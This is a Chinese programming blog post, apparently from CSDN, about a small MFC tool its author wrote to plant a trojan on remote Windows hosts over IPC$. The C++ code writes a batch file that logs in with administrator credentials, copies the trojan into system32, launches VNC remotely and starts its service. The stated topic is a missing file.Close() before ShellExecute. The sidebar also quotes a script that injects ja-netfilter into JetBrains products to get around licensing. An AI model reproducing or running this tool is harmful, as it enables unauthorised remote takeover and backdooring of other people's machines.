由file.Close()引发ShellExecute 无法执行

最新推荐文章于 2022-11-24 12:33:55 发布
最新推荐文章于 2022-11-24 12:33:55 发布
阅读量116 收藏
点赞数
本文介绍了一个使用IPC自动种植木马的小程序实现过程。通过编写bat文件并利用ShellExecute函数来执行,最终实现了远程主机上的木马部署及启动。

今天写了一个用IPC自动种植木马的程序

思路是将要执行的命令写入一个 bat 文件

然后用ShellExecute 执行bat文件

写bat 的文件代码如下:

void CIps4Dlg::OnOK()
{

//构建net use //ip/ipc$ "" /user:"administrator"
CString ip;
CString pass;
CString user;
CString muma;
GetDlgItemText(IDC_EDMUMA,muma);
GetDlgItemText(IDC_EDIP,ip);
GetDlgItemText(IDC_EDUSER,user);
GetDlgItemText(IDC_EDPASS,pass);
CString se1="net use ////";
se1+=ip;
se1+="//ipc$";
se1+=" /"";
se1+=pass;
se1+="/"";
se1+=" /user:/"";
se1+=user;
se1+="/"";

//构建COPY 文件命令
CString se2="copy ";
se2+=muma;
se2+=" ////";
se2=se2+ip;
se2+="//admin$//system32";

//构建运行木马的命令
CString se3="ps ////";
se3=se3+ip;
se3+=" c://winnt//system32//vnc.exe -d";
//查看用户
CString se4="ps ////";
se4=se4+ip;
se4+=" net user";
//用SC开始VNC的服务
CString se5="sc ////";
se5=se5+ip;
se5+=" start winvnc";
//删除IPC连接
CString se6="net use////";
se6=se6+ip;
se6+=" /del";

/////////////////////////////////////////
//将运行命令写入BAT文件

CFile file("bat.bat",CFile::modeCreate|CFile::modeReadWrite);
file.Write(se1,60);
file.Write(_T("/r/n"),2);
file.Write(_T("/r/n"),2);
file.Write(se2,55);
file.Write(_T("/r/n"),2);
file.Write(_T("/r/n"),2);
file.Write(se3,55);
file.Write(_T("/r/n"),2);
file.Write(_T("/r/n"),2);
file.Write(se4,55);
file.Write(_T("/r/n"),2);
file.Write(_T("/r/n"),2);
file.Write(se5,55);
file.Write(_T("/r/n"),2);
file.Write(_T("/r/n"),2);
file.Write(se6,55);
file.Write(_T("/r/n"),2);
file.Write(_T("/r/n"),2);
file.Write("pause",7);
file.Write(_T("/r/n"),2);
file.Write(_T("/r/n"),2);
}

写入成功后执行:

////////////////////////////////////////
//运行BAT文件
if(ShellExecute (NULL,"open","bat.bat",NULL,NULL,SW_SHOW)<(HANDLE)32)

MessageBox("Can't ShellExecute");

这是出现错误

开始以为是文件的打开放是有误

查了一下msdn

加了一句

CFile::shareExclusive

以读写共享的方式打开文件

可惜失败了!

自己新建一个 bat文件用ShellExecute试一下

成功!这说明用ShellExecute可以调用执行批处理文件

而问题出在 file.write上

仔细观察代码 发现漏了一句!!

file.close();

加上试试成功调用!

写这么一个小程序就发现之么多问题

以后还得多写~~~~~~~~~~~

iteye_9378
关注
API函数ShellExecuteShellExecuteEx用法
dkopg24406的专栏
08-13 1994
ShellExecute: 1.函数功能:你可以给它任何文件的名字,它都能识别出来并打开它。2.函数原型: HINSTANCE ShellExecute( HWND hwnd, LPCTSTR lpOperation, LPCTSTR lpFile, LPCTSTR lpParameters, LPCTSTR lpDirectory, INT nShowCmd );...
Excel-VBA宏编程实例源代码-在程序中执行其他程序.zip
03-18
7. **文件操作**:在调用外部程序时,可能需要读写文件,理解VBA中的FileOpen、FileClose、WriteLine等文件操作函数。 8. **参数传递**:了解如何在VBA和外部程序之间传递参数,比如通过命令行参数或配置文件。 9....
file.close()后CopyFile函数执行失败的原因
momohouqi的专栏
06-14 2023
现象:                file.close()后,系统需要把内存中内容写入硬盘,要花些时间,若此时直接去CopyFile这个file,则会失败。通过GetLastError()得到32,错误原因是,当前文件被占用,即正在写回磁盘。 解决方法:        休息些时间,等待系统把内存写入磁盘后,就可以。循环多次,确保复制成功。        nTime = 100;
关闭使用ShellExecute打开的进程!!!!!
weixin_34080903的博客
09-11 1224
前言:   最近做一个项目使用到ShellExecute来打开一个带参数的外部exe文件,关闭时遇到不少问题,最终解决,总结如下。   对于关闭ShellExecute打开的进程窗口,网上比较多的是用FindWindow方式,可惜我也不知道这窗口的名称,晕倒。通过查询资料找到以下方式可以关闭进程。 贴代码:   // lpProcessName为打开的进程名称 带文件类型后缀 如:****...
关闭使用ShellExecute打开的进程
《好好先生》专栏
01-09 4339
关闭使用ShellExecute打开的进程 最近做一个项目使用到ShellExecute来打开一个带参数的外部exe文件,关闭时遇到不少问题,最终解决,总结如下。 对于关闭ShellExecute打开的进程窗口,网上比较多的是用FindWindow方式,可惜我也不知道这窗口的名称。通过查询资料找到以下方式可以关闭进程: // lpProcessName为打开的进程名称 带文件类型后缀 如:*...
记一次defer file.close的坑
qq_43364951的博客
11-24 390
defer close
此时不应有 .ShellExecute("F:\Pyhton\0908\Install.bat"。
09-10
mshta vbscript:CreateObject("Shell.Application").ShellExecute("%~s0","%*","","runas",1)(window.close) 当脚本路径中包含特殊字符(如括号、空格、&等)时,可能会引起VBScript解析错误。 解决方案: 1. ...
If Not WScript.Arguments.Named.Exists("elevate") Then CreateObject("Shell.Application").ShellExecute WScript.FullName, """" & WScript.ScriptFullName & """ /elevate", "", "runas", 10 WScript.Quit End If Set oShell = CreateObject("WScript.Shell") Set oEnvSystem = oShell.Environment("SYSTEM") Set oFS = CreateObject("Scripting.FileSystemObject") Dim sBasePath, sJarFile sBasePath = oFS.GetParentFolderName(oFS.GetParentFolderName(WScript.ScriptFullName)) sJarFile = sBasePath & "\ja-netfilter.jar" If Not oFS.FileExists(sJarFile) Then MsgBox "ja-netfilter.jar not found", vbOKOnly Or vbCritical WScript.Quit -1 End If MsgBox "!!!!!!!!!!!请先关闭软件!!!!!!!!!!!" & vbCrLf & vbCrLf & "!!!!!!!!!!!请先关闭软件!!!!!!!!!!!" & vbCrLf & vbCrLf & "!!!!!!!!!!!请先关闭软件!!!!!!!!!!!" & vbCrLf & vbCrLf & "个别电脑执行脚本可能需要十多分钟." & vbCrLf & vbCrLf & "点击确定按钮后,一直等直到'完成'提示的弹出.即可进行下一步操作." & vbCrLf & vbCrLf & "仅用于研究学习 请在使用后24小时内删除." Dim sEnvKey, sEnvVal, aJBProducts aJBProducts = Array("idea", "clion", "phpstorm", "goland", "pycharm", "webstorm", "webide", "rider", "datagrip", "rubymine", "appcode", "dataspell", "gateway", "jetbrains_client", "jetbrainsclient", "studio", "devecostudio") Set re = New RegExp re.Global = True re.IgnoreCase = True re.Pattern = "^\-javaagent:.*[\/\\]ja\-netfilter\.jar.*" Sub RemoveEnv(env) On Error Resume Next For Each sPrd in aJBProducts sEnvKey = UCase(sPrd) & "_VM_OPTIONS" sEnvVal = oShell.ExpandEnvironmentStrings("%" & sEnvKey & "%") If sEnvVal <> ("%" & sEnvKey & "%") Then env.Remove(sEnvKey) End If Next End Sub RemoveEnv oShell.Environment("USER") Dim sVmOptionsFile For Each sPrd in aJBProducts sEnvKey = UCase(sPrd) & "_VM_OPTIONS" sVmOptionsFile = sBasePath & "\vmoptions\" & sPrd & ".vmoptions" If oFS.FileExists(sVmOptionsFile) Then ProcessVmOptions sVmOptionsFile oEnvSystem(sEnvKey) = sVmOptionsFile End If Next Sub ProcessVmOptions(ByVal file) Dim sLine, sNewContent, bMatch Set oFile = oFS.OpenTextFile(file, 1, 0) sNewContent = "" Do Until oFile.AtEndOfStream sLine = oFile.ReadLine bMatch = re.Test(sLine) If Not bMatch Then sNewContent = sNewContent & sLine & vbLf End If Loop oFile.Close sNewContent = sNewContent & "-javaagent:" & sJarFile & "=jetbrains" Set oFile = oFS.OpenTextFile(file, 2, 0) oFile.Write sNewContent oFile.Close End Sub MsgBox "完成." 分析以上脚本功能及安全性
最新发布
09-14
If fso.FileExists("C:\test.txt") Then WScript.Echo "文件存在" Else WScript.Echo "文件不存在" End If ``` 该代码检查 `C:\test.txt` 文件是否存在。 #### 环境变量处理 环境变量处理可获取、设置或修改系统...
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit cd /d "%~dp0" setx /m UGII_BASE_DIR "D:\Program Files\Siemens\NX 8.5" setx /m UGII_ROOT_DIR "D:\Program Files\Siemens\NX 8.5\UGII" :: 设置环境变量(系统级) SETX /M VS2019_PATH "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise" SETX /M DEV_ENV "Production" :: 设置临时会话变量(仅当前会话有效) SET TEMP_VAR=DebugMode :: 启动 Visual Studio 2019 echo 正在启动 Visual Studio 2019... start "" "%VS2019_PATH%\Common7\IDE\devenv.exe" :: 可选:等待VS关闭后执行清理 :: taskkill /f /im MSBuild.exe >NUL 2>NUL :: echo 清理完成! 使用这种方式 该环境变量之后自动打开关闭vs2019 在不同路径下编译五个版本
06-26
echo ======================================= >> %log_file% :: 执行编译(支持x86/x64平台) "%VS_PATH%\Common7\IDE\devenv.com" !solution! /build "Release|x64" /Out %log_file% :: 检查编译结果 if...
[转]ShellExecute 的应用技巧
iloveyaner527的专栏
07-08 643
以默认程序打开文档  要以与文件后缀名关联的程序打开文档,在Windows 9X和Windows NT下可以用ShellExcute函数方便地实现。这则小技巧展示了会有多方便—你只需要一个声明和一行代码!  开始一个新项目。在Form上放一个Command button,然后加入以下代码:Private Declare Function ShellExecute Lib "shell32.dl
ShellExecute, WinExec, CreateProcess区别
jgshangxuanyue的专栏
12-11 654
ShellExecute   ShellExecute的功能是运行一个外部程序(或者是打开一个已注册的文件、打开一个目录、打印一个文件等等),并对外部程序有一定的控制。   有几个API函数都可以实现这些功能,但是在大多数情况下ShellExecute是更多的被使用的,同时它并不是太复杂。   ShellExecute函数原型及参数含义如下:   ShellExecute(
ShellExecute用法种种
Sayesan的专栏
05-08 1763
Q: 如何打开一个应用程序?  ShellExecute(this->m_hWnd,"open","calc.exe","","", SW_SHOW );或 ShellExecute(this->m_hWnd,"open","notepad.exe","c:\\MyLog.log","",SW_SHOW );正如您所看到的,我并没有传递程序的完整路径。 Q: 如何打开一个同系统程序相关连的
ShellExecute 和hellExecuteEx使用详解
Keep Moving~
07-07 2684
函数功能: 你可以给它任何文件的名字,它都能识别出来并打开它。 函数原型: HINSTANCE ShellExecuteA( HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd ); 参数说明: 【hwnd...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值